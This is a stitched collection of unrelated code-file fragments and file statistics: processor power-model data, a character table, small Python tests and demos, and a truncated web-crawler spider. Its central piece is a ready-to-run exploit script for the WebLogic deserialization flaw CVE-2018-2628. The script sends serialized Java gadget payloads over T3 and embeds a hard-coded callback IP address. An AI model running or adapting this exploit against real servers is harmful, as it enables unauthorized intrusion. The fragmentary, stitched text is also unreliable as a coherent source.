'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.399382,
'Execution Unit/Register Files/Runtime Dynamic': 0.120885,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.435213,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.912457,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.98242,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000684763,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000684763,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000596675,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000231118,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00152968,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00349589,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00655661,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.102368,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.219719,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.347688,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96396,
'Instruction Fetch Unit/Runtime Dynamic': 0.679827,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0500278,
'L2/Runtime Dynamic': 0.00792427,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.56757,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.12261,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0753955,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0753955,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.9236,
'Load Store Unit/Runtime Dynamic': 1.56983,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.185912,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.371825,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0659809,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0667291,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0360286,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.669447,
'Memory Management Unit/Runtime Dynamic': 0.102758,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 23.4603,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.572582,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0224559,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.162322,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.757359,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 6.10012,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 2.67763722357763,
'Runtime Dynamic': 2.67763722357763,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.266145,
'Runtime Dynamic': 0.139506,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 97.385,
'Peak Power': 130.497,
'Runtime Dynamic': 28.603,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 97.1189,
'Total Cores/Runtime Dynamic': 28.4634,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.266145,
'Total L3s/Runtime Dynamic': 0.139506,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.032823
| 124
| 0.681948
| 8,082
| 68,580
| 5.780747
| 0.067558
| 0.12363
| 0.113014
| 0.093493
| 0.939983
| 0.931956
| 0.919307
| 0.888891
| 0.865625
| 0.847132
| 0
| 0.131475
| 0.224424
| 68,580
| 914
| 125
| 75.032823
| 0.746903
| 0
| 0
| 0.646608
| 0
| 0
| 0.657689
| 0.048118
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
727808df0af2db769c678df00978f6da5d175b8a
| 263
|
py
|
Python
|
python/anyascii/_data/_112.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_112.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
python/anyascii/_data/_112.py
|
casept/anyascii
|
d4f426b91751254b68eaa84c6cd23099edd668e6
|
[
"ISC"
] | null | null | null |
b=' 0 1 2 3 4 5 6 7 8 9'
| 263
| 263
| 0.041825
| 11
| 263
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.714286
| 0.946768
| 263
| 1
| 263
| 263
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0.981061
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72d61f47023a20d7e72765708310910c82f4471c
| 174
|
py
|
Python
|
tests/providers/kuaidaili_provider_test.py
|
gillbates/scylla
|
88b999eb60504c23041a56b343c6a021d778538d
|
[
"Apache-2.0"
] | null | null | null |
tests/providers/kuaidaili_provider_test.py
|
gillbates/scylla
|
88b999eb60504c23041a56b343c6a021d778538d
|
[
"Apache-2.0"
] | null | null | null |
tests/providers/kuaidaili_provider_test.py
|
gillbates/scylla
|
88b999eb60504c23041a56b343c6a021d778538d
|
[
"Apache-2.0"
] | null | null | null |
from scylla.providers import KuaidailiProvider
from tests.providers.helpers import assert_provider
def test_cool_proxy_provider():
assert_provider(KuaidailiProvider())
| 24.857143
| 51
| 0.844828
| 20
| 174
| 7.1
| 0.65
| 0.197183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097701
| 174
| 6
| 52
| 29
| 0.904459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72ea66d5ad5a6d8a62759613cd568e45a1e387b5
| 179
|
py
|
Python
|
7day/re/Re11.py
|
jsjang93/joony
|
62f7a325094c887212b894932263bf84500e0f03
|
[
"MIT"
] | null | null | null |
7day/re/Re11.py
|
jsjang93/joony
|
62f7a325094c887212b894932263bf84500e0f03
|
[
"MIT"
] | null | null | null |
7day/re/Re11.py
|
jsjang93/joony
|
62f7a325094c887212b894932263bf84500e0f03
|
[
"MIT"
] | null | null | null |
import re
print(re.search( "^ap","apple"))
print(re.search("[^ap]","apple"))
print(re.search("[^ab]","bread"))
print(re.search("[^ab]","orange"))
print(re.search("[^ap]","anana"))
| 29.833333
| 34
| 0.608939
| 27
| 179
| 4.037037
| 0.37037
| 0.321101
| 0.59633
| 0.412844
| 0.486239
| 0.486239
| 0.486239
| 0.486239
| 0
| 0
| 0
| 0
| 0.039106
| 179
| 6
| 35
| 29.833333
| 0.633721
| 0
| 0
| 0
| 0
| 0
| 0.272222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.833333
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
f41364fdb6a974330d2f606eb183bfe447514600
| 6,878
|
py
|
Python
|
poc/CVE_2018_2628.py
|
rabbitmask/Weblogic-
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | 1,593
|
2019-05-14T05:58:32.000Z
|
2022-03-30T05:23:52.000Z
|
poc/CVE_2018_2628.py
|
secfb/WeblogicScan
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | 13
|
2019-09-03T17:27:29.000Z
|
2022-02-16T04:51:05.000Z
|
poc/CVE_2018_2628.py
|
secfb/WeblogicScan
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | 365
|
2019-05-14T06:11:09.000Z
|
2022-03-31T13:57:03.000Z
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''
import socket
import sys
import time
import re
# Identifier of the vulnerability this PoC reports on.
VUL=['CVE-2018-2628']
# Hex-encoded serialized Java object stream (note the "aced0005" stream magic
# at the start).  NOTE(review): the hex embeds the ASCII bytes of
# "104.251.228.50" (3130342e3235312e3232382e3530) — presumably a hard-coded
# callback/UnicastRef address baked into the gadget; confirm before relying
# on it.
PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
# Regex applied to the raw server response; a JDK dynamic proxy class name
# such as "$Proxy12" in the reply is taken as evidence the object stream was
# deserialized (see checkVul below).
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
    """Connect to the target and perform the WebLogic T3 protocol greeting.

    The hex blob decodes to the ASCII handshake
    "t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\n\\n"; the server's reply is
    read and discarded.
    """
    hello = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'
    sock.connect(server_addr)
    sock.send(bytes.fromhex(hello))
    time.sleep(1)
    sock.recv(1024)
def buildT3RequestObject(sock,rport):
    # Send the four hex-encoded fragments of a T3 request object in order.
    # The fragments embed serialized weblogic.rjvm / weblogic.common.internal
    # class-table entries ("aced0005..." stream segments are visible inline);
    # byte order and content are protocol-exact and must not be altered.
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    # data2 interpolates the target port as 4 hex digits at the {0} slot; the
    # hex also embeds ASCII "192.168.1.227" — presumably a leftover capture
    # address from the original PoC environment (TODO confirm harmless).
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    # Send each fragment, pausing between writes so the server processes them
    # as separate protocol packets.
    for d in [data1,data2,data3,data4]:
        sock.send(bytes.fromhex(d))
        time.sleep(2)
def sendEvilObjData(sock,data):
    # Wrap the caller-supplied serialized gadget (hex string `data`) in the
    # fixed T3 envelope, prepend the total length, send it, and collect up to
    # ten reads of the server's reply as text.
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # Prefix the message with its total byte length (hex chars / 2, plus the
    # 4 length bytes themselves) as an 8-hex-digit header.
    payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
    sock.send(bytes.fromhex(payload))
    res = ''
    try:
        count = 0
        # Read up to 10 chunks; undecodable bytes are dropped ("ignore") since
        # only the ASCII "$ProxyN" signature matters downstream.
        while count<10:
            res += sock.recv(4096).decode("utf8","ignore")
            time.sleep(0.1)
            count += 1
    except Exception:
        # A timeout/reset simply ends collection; partial output is returned.
        pass
    return res
def checkVul(res,rip,rport):
    """Decide from the server response whether the target looks vulnerable.

    Returns a (status, message) tuple: status 1 with a "[+]" message when the
    JDK dynamic-proxy signature (VER_SIG) appears in `res`, otherwise status 0
    with a "[-]" message.
    """
    target = '{}:{}'.format(rip, rport)
    if re.search(VER_SIG[0], res, re.S) is not None:
        return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(target,VUL[0]))
    return (0,'[-] [{}] weblogic not detected {}'.format(target,VUL[0]))
def run(rip,rport):
    """Probe a single host/port for CVE-2018-2628 and return (status, message)."""
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.settimeout(20)
    # Handshake first, then the T3 request object, then the gadget payload.
    t3handshake(conn, (rip, rport))
    buildT3RequestObject(conn, rport)
    reply = sendEvilObjData(conn, PAYLOAD[0])
    return checkVul(reply, rip, rport)
if __name__=="__main__":
    # Usage: python CVE_2018_2628.py <host> <port>
    target_host, target_port = sys.argv[1], int(sys.argv[2])
    run(target_host, target_port)
| 95.527778
| 2,063
| 0.867839
| 225
| 6,878
| 26.12
| 0.457778
| 0.006806
| 0.006636
| 0.010209
| 0.007147
| 0.007147
| 0
| 0
| 0
| 0
| 0
| 0.64443
| 0.075894
| 6,878
| 72
| 2,064
| 95.527778
| 0.280208
| 0.044344
| 0
| 0
| 0
| 0
| 0.782622
| 0.758435
| 0
| 1
| 0
| 0
| 0
| 1
| 0.092593
| false
| 0.018519
| 0.074074
| 0
| 0.240741
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f413ce93b672ed29d1a3d5ac98626b596cc500dc
| 22,625
|
py
|
Python
|
Matc_links/Matc_links/spiders/get_links3.py
|
Nouldine/MyCrawlerSystem
|
7bba8ba3ec76e10f70a35700602812ee6f039b63
|
[
"MIT"
] | null | null | null |
Matc_links/Matc_links/spiders/get_links3.py
|
Nouldine/MyCrawlerSystem
|
7bba8ba3ec76e10f70a35700602812ee6f039b63
|
[
"MIT"
] | null | null | null |
Matc_links/Matc_links/spiders/get_links3.py
|
Nouldine/MyCrawlerSystem
|
7bba8ba3ec76e10f70a35700602812ee6f039b63
|
[
"MIT"
] | null | null | null |
from scrapy import Spider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.linkextractors import LinkExtractor
import scrapy
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from Matc_links.items import MatcLinksItem
class Matc_links( scrapy.Spider ):
    """Spider that collects every anchor href from Madison College catalog pages.

    Fixes over the previous revision:
    - Many entries in the old hand-written ``start_urls`` list were missing
      separating commas, so Python's implicit string concatenation silently
      fused adjacent URLs into unusable garbage requests.  The list is now
      generated from subject-code tables (the catalog letter is always the
      first character of the subject code, including percent-encoded ones
      like ``CUL%20ARTS`` -> ``C``).
    - ``errback_httpbin`` referenced the undefined name ``TPCTimeOutError``
      (the import is ``TCPTimedOutError``), raising NameError on timeouts,
      and its DNS log format string was missing the ``s`` conversion.
    """
    name = 'matc_links3'
    allowed_domains = ['madisoncollege.edu']

    # Subject codes offered for degree credit (DEGR), in catalog order.
    _DEGR_SUBJECTS = [
        'ACCTG', 'ADMINPRF', 'AGMECH', 'ANIM', 'ANIMTOON', 'ANTHRO', 'ARABIC',
        'ARCHDR', 'ARCHT', 'ART', 'ASTRON', 'AUTMFG', 'AUTOBODY', 'AUTOMECH',
        'AUTOTEC',
        'DENTAST', 'DENTHYG', 'DIESEL', 'DIETTEC', 'DRAMA',
        'HEALTH', 'HISTORY', 'HORT', 'HOSPT', 'HRMGT', 'HUMSVC', 'HVAC',
